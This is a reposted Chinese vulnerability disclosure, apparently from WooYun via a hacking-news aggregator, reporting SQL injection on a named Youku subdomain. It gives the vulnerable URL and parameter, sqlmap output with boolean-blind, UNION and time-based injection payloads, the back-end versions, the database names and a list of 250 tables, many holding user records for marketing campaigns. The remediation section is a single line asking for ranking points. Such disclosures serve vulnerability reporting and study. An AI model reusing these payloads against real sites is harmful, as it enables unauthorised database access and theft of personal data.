记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

优酷分站SQL注入

2015-01-02 08:20

code 区域
http://hvsop.youku.com/list.php?music=1



09.jpg





code 区域
sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: music

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: music=1' AND 7821=7821 AND 'IbzW'='IbzW



Type: UNION query

Title: MySQL UNION query (NULL) - 15 columns

Payload: music=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,C

ONCAT(0x7178686571,0x496c4e6172726d6c4b7a,0x7166706a71),NULL,NULL,NULL,NULL,NULL

,NULL#



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: music=1' AND SLEEP(5) AND 'fKmP'='fKmP

---

[22:00:42] [INFO] the back-end DBMS is MySQL

web application technology: Apache, PHP 5.3.10

back-end DBMS: MySQL 5.0.11

[22:00:42] [INFO] fetching database names

available databases [3]:

[*] db_events

[*] information_schema

[*] test



[22:00:42] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\ou

tput\hvsop.youku.com'

漏洞证明:

code 区域
Database: db_events

[250 tables]

+--------------------------+

| 7up_user |

| adidas_2010_football |

| adidas_2011_tvc_info |

| adidas_comments |

| aveo_clicks |

| aveo_comments |

| aveo_users |

| background_users |

| bosideng_1024_users |

| bosideng_code |

| bosideng_fake_users |

| bosideng_photos |

| bosideng_users |

| bosideng_video_vote_logs |

| bosideng_videos |

| bosideng_vote_logs |

| bsd_kpi_email |

| bsd_kpi_user |

| bsd_rt_log |

| bsd_user |

| bugles_videos |

| casesharing_2013 |

| cgirl2014_awards |

| cgirl_images |

| cgirl_users |

| cgirl_videos |

| chengxin_news |

| chery_comments |

| chery_photo_vote_logs |

| chery_photos |

| chery_users |

| chery_video_vote_logs |

| chery_videos |

| cityshow_comment |

| cityshow_data |

| cityshow_member |

| clear_game_log |

| clear_log |

| clear_rt_log |

| clear_users |

| crowneplaza_register |

| cruze_images |

| cruze_users |

| cruze_videos |

| deyi_tickets_users |

| dove2014_erweima |

| dove2014_videos |

| dove_user |

| dove_video |

| dumex_videos |

| etam_comment |

| etam_txt |

| fiesta_2011_guestbook |

| fm_dream |

| fm_kpi_member |

| fm_number |

| fm_number_bak |

| fm_number_t |

| fm_number_test |

| fm_support_log |

| fm_user |

| fm_vote_log |

| fm_work |

| ford_users |

| global_accounts |

| global_china |

| global_files |

| global_minisites |

| global_testing |

| global_units |

| greetingcard_params |

| gucci_comments |

| gucci_rt_logs |

| gucci_users |

| hkdl_users |

| ht_config |

| ht_guest |

| ht_user |

| htc_config |

| hvsop2013_awards |

| hvsop2014_20 |

| hvsop2014_users |

| hvsop_comments |

| hvsop_live_email |

| hvsop_resumes |

| hvsop_users |

| hvsop_videos |

| hvsop_vote_logs |

| icedew_videos |

| jasmine_comments |

| jw2ask_marked |

| jw2ask_plans |

| jw2ask_questions |

| jw2ask_same_q |

| jw2ask_top30_grade_logs |

| kohler_comments |

| kohler_mm_awards |

| kohler_photo_vote_logs |

| kohler_photos |

| kohler_prize_logs |

| kohler_users |

| kohler_video_vote_logs |

| kohler_videos |

| lancome_datas |

| lancome_infos |

| lancome_users |

| lee_moment_photos |

| lee_moment_votelog |

| levis_data |

| levis_logs |

| levis_win |

| loreal_flash_ad |

| mabelline_users |

| mamonde_2013_videos |

| market_huanzhu_votes |

| marketing_apply_info |

| marketing_darenxiu |

| marketing_fashion |

| marketing_jianjiancao |

| marketing_kfc_avatar |

| marketing_kfc_cms |

| marketing_laifushi |

| marketing_upload_info |

| mmd_datas |

| mql_award |

| mql_seckill |

| mql_seckill_bak |

| mql_seckill_log |

| nfsq_users |

| nikegz_comments |

| nikegz_image |

| nikegz_pks |

| nikegz_videos |

| nivea_answer_logs |

| nivea_awards |

| nivea_final_awards |

| nivea_photos |

| nivea_question |

| nivea_users |

| nivea_vote_logs |

| onstar_regist |

| onstar_video |

| oreo_images |

| oreo_videos |

| pepsi_comments |

| pepsi_ecards |

| pepsi_media |

| pepsi_users |

| pepsi_videos |

| pepsi_vote_logs |

| pepsicny_videos |

| qingyang_comment |

| qingyang_videos |

| remyvsop_banner |

| remyvsop_comment |

| remyvsop_mobile |

| remyvsop_news |

| remyvsop_register |

| remyvsop_teams |

| remyvsop_videos |

| ricola_pincode |

| ricola_tickets |

| roewe_comment |

| roewe_config |

| roewe_guess |

| roewe_player |

| roewe_user |

| scj_users |

| sprite_users |

| sprite_videos |

| superb_comments |

| superb_comments_bak |

| superb_videos |

| sww_2011_users |

| sww_2011_videos |

| unit_cachedata |

| unit_comments |

| unit_misc |

| unit_news |

| unit_users |

| unit_videos |

| unit_visitors |

| unit_voting |

| vichy2013_awards |

| vichy2013_winners |

| vsop_email |

| vsop_live_mobile |

| vsop_loop_videos |

| vsop_lyp |

| vsop_users |

| vsop_videos |

| vsop_vote_email |

| wtcc_2011_guestbook |

| wtcc_2011_shots |

| wtcc_2011_users |

| wzmt_awards |

| wzmt_awards_bak |

| wzmt_seckill |

| wzmt_seckill_log |

| z_acer_user |

| z_bwnzb_user |

| z_eleven_user |

| z_fanta |

| z_fanta_email |

| z_ferrari |

| z_ferrero_user |

| z_huggies |

| z_huggies_comments |

| z_k3 |

| z_k3_user |

| z_k3_v |

| z_lenscrafter_pic |

| z_lenscrafter_user |

| z_loreal |

| z_market_disney |

| z_market_topchef |

| z_proya2011_100 |

| z_proya2011_code |

| z_proya2011_mblog |

| z_proya2011_pic |

| z_proya2011_user |

| z_proya2011_v2_pic |

| z_proya2011_v2_user |

| z_proya_pic |

| z_proya_user |

| z_remyclub_comment |

| z_remyclub_user |

| z_riich_user |

| z_sdeer_user |

| z_sepb_user |

| z_sgm15th |

| z_volvo |

| z_wp_code |

| z_young |

| z_z_comment |

| z_z_contact |

| z_z_contact2 |

| z_z_email |

| z_z_img |

| z_z_luck |

| z_z_module_luck |

| z_z_p |

| z_z_txt |

| z_z_txt_vote |

| z_z_v |

| z_z_vote |

| z_z_vote_id |

| z_z_vote_ip |

| zhijue_users |

| zqbb_videos |

+--------------------------+

修复方案:

我就跑到表,不深入了,修复吧,谢谢~好几天没rank了能来点不?

知识来源: www.wooyun.org/bugs/wooyun-2015-083661

阅读:102221 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“优酷分站SQL注入”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云